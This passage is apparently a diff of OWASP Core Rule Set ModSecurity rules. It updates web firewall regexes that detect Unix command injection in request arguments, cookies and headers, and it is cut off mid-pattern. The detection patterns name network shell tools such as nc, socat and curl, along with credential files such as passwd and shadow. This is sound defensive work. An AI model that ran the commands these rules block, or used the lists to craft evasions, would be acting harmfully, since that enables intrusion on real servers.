-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i|(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))\b" \
     "id:932232,\
     phase:2,\
     block,\
@@ -577,11 +651,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[ar]?|a(?:b|pt(?:-get)?|r(?:[jp]|ch[\s\v<>]|ia2c)?|s(?:h|cii(?:-xfr|85)|pell)?|t(?:obm)?|w[ks]|dduser|getty|l(?:ias|pine)[\s\v<>]|nsible-playbook)|b(?:z(?:z|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2|less|more)|a(?:s(?:e(?:32|64|nc)|h)|tch[\s\v<>])|pftrace|r(?:eaksw|idge[\s\v<>])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v<>]|zip2)|s(?:ctl|ybox))|yebug)|c(?:[8-9]9|a(?:t|(?:ncel|psh)[\s\v<>])|c|mp|p(?:an|io|ulimit)?|s(?:h|plit|vtool)|u(?:t|psfilter|rl)|ertbot|h(?:attr|dir[\s\v<>]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|flags|mod|o(?:om|wn)|root)|o(?:(?:b|pro)c|lumn[\s\v<>]|m(?:m(?:and[\s\v<>])?|p(?:oser|ress[\s\v<>]))|w(?:say|think))|r(?:ash[\s\v<>]|ontab))|d(?:[du]|i(?:g|(?:alog|ff)[\s\v<>])|nf|a(?:sh|te)[\s\v<>]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v<>]|sbox)|pkg|vips)|e(?:[bd]|n(?:v(?:-update)?|d(?:if|sw))|qn|x(?:ec[\s\v<>]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v<>]|r))?|(?:asy_instal|va)l|cho[\s\v<>]|fax|grep|macs|sac)|f(?:c|i(?:le(?:[\s\v<>]|test)|(?:n(?:d|ger)|sh)[\s\v<>])?|mt|tp(?:stats|who)?|acter|(?:etch|lock)[\s\v<>]|grep|o(?:ld[\s\v<>]|reach)|ping|unction)|g(?:c(?:c|ore)|db|e(?:m|ni(?:e[\s\v<>]|soimage)|tfacl[\s\v<>])|hci?|i(?:t|mp[\s\v<>]|nsh)|o|r(?:c|ep[\s\v<>])|awk|tester|unzip|z(?:cat|exe|ip))|h(?:d|up|e(?:ad[\s\v<>]|xdump)|i(?:ghlight|story)[\s\v<>]|ost(?:id|name)|ping3|t(?:digest|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v<>]|onice|spell)|j(?:js|q|ava[\s\v<>]|exec|o(?:(?:bs|in)[\s\v<>]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v<>]|all)|nife[\s\v<>])|l(?:d(?:d|config)?|[np]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:(?:la)?tex)?|z(?:c(?:at|mp)|diff|[e-f]?grep|less|m(?:a|ore))?|a(?:st(?:[\s\v<>]|comm|log(?:in)?)|tex[\s\v<>])|ess(?:[\s\v<>]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v<>]|o(?:(?:ca(?:l|te)|ok)[\s\v<>]|g(?:inctl|(?:nam|sav)e))|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:n|il(?:q|x[\s\v<>])?|ke[\s\v<>]|wk)|tr|v|(?:kdir|utt)[\s\v<>]|locate|o(?:(?:re|unt)[\s\v<>]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:\.(?:openbsd|traditional)|at)?|e(?:t(?:(?:c|st)at|kit-ftp)?|ofetch)|l|m(?:ap)?|p(?:m|ing)|a(?:no[\s\v<>]|sm|wk)|ice[\s\v<>]|o(?:de[\s\v<>]|hup)|roff|s(?:enter|lookup|tat))|o(?:d|ctave[\s\v<>]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:x|s(?:swd|te[\s\v<>])|tch[\s\v<>])|d(?:b|f(?:la)?tex)|f(?:tp)?|g(?:rep)?|hp|i(?:c(?:o[\s\v<>])?|p|dstat|gz|ng[\s\v<>])|k(?:g(?:_?info)?|exec|ill)|r(?:y|int(?:env|f[\s\v<>]))?|s(?:ftp|ql)?|t(?:x|ar(?:diff|grep)?)|xz|er(?:f|l(?:5|sh)?|ms)|opd|ython[^\s\v]|u(?:ppet[\s\v<>]|shd))|r(?:a(?:r|k(?:e[\s\v<>]|u))|cp|e(?:d(?:carpet[\s\v<>])?|v|a(?:delf|lpath)|(?:name|p(?:eat|lace))[\s\v<>]|stic)|m(?:dir[\s\v<>]|user)?|pm(?:db|(?:quer|verif)y)?|l(?:ogin|wrap)|nano|oute[\s\v<>]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v<>])|e(?:d|t(?:arch|env|facl[\s\v<>]|sid)?|ndmail|rvice[\s\v<>])|g|h(?:\.distrib|ell|u(?:f|tdown[\s\v<>]))?|s(?:h(?:-key(?:ge|sca)n|pass)?)?|u(?:do)?|vn|(?:ash|nap|plit)[\s\v<>]|diff|ftp|l(?:eep[\s\v<>]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v<>])|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr]|il[\s\v<>f]|sk(?:set)?)|bl|e(?:[ex]|lnet)|i(?:c|me(?:(?:out)?[\s\v<>]|datectl))|o(?:p|uch[\s\v<>])|c(?:l?sh|p(?:dump|ing|traceroute))|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:l(?:imit[\s\v<>])?|n(?:ame|compress|expand|iq|l(?:ink[\s\v<>]|z(?:4|ma))|(?:pig|x)z|rar|s(?:et|hare)[\s\v<>]|z(?:ip|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:diff)?|ew[\s\v<>]|gr|pw|rsh)?|algrind|olatility)|w(?:3m|c|h(?:o(?:ami|is)?|iptail)|a(?:ll|tch)[\s\v<>]|get|i(?:reshark|sh[\s\v<>]))|x(?:(?:x|pa)d|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)?|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:um|arn|elp[\s\v<>])|z(?:ip(?:details)?|s(?:h|oelim|td)|athura|c(?:at|mp)|diff|[e-f]?grep|less|more|run|ypper))\b" \
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:(?:itude)?[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|lumn[\s\v&\)<>\|]|m(?:m(?:and[\s\v&\)<>\|])?|p(?:oser|ress)[\s\v&\)<>\|])|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|n?f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|ed|ftp|ql)?|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|u(?:ppet[\s\v&\)<>\|]|shd)|ython[2-3])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:ew)?[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|diff)|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:[\s\v&\)<>c\|]|h(?:o(?:[\s\v&\)<>\|]|ami|is)?|iptail[\s\v&\)<>\|])|a(?:ll|tch)[\s\v&\)<>\|]|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))\b" \
     "id:932237,\
     phase:2,\
     block,\
@@ -597,7 +671,27 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[ar]?
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
+    severity:'CRITICAL',\
+    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)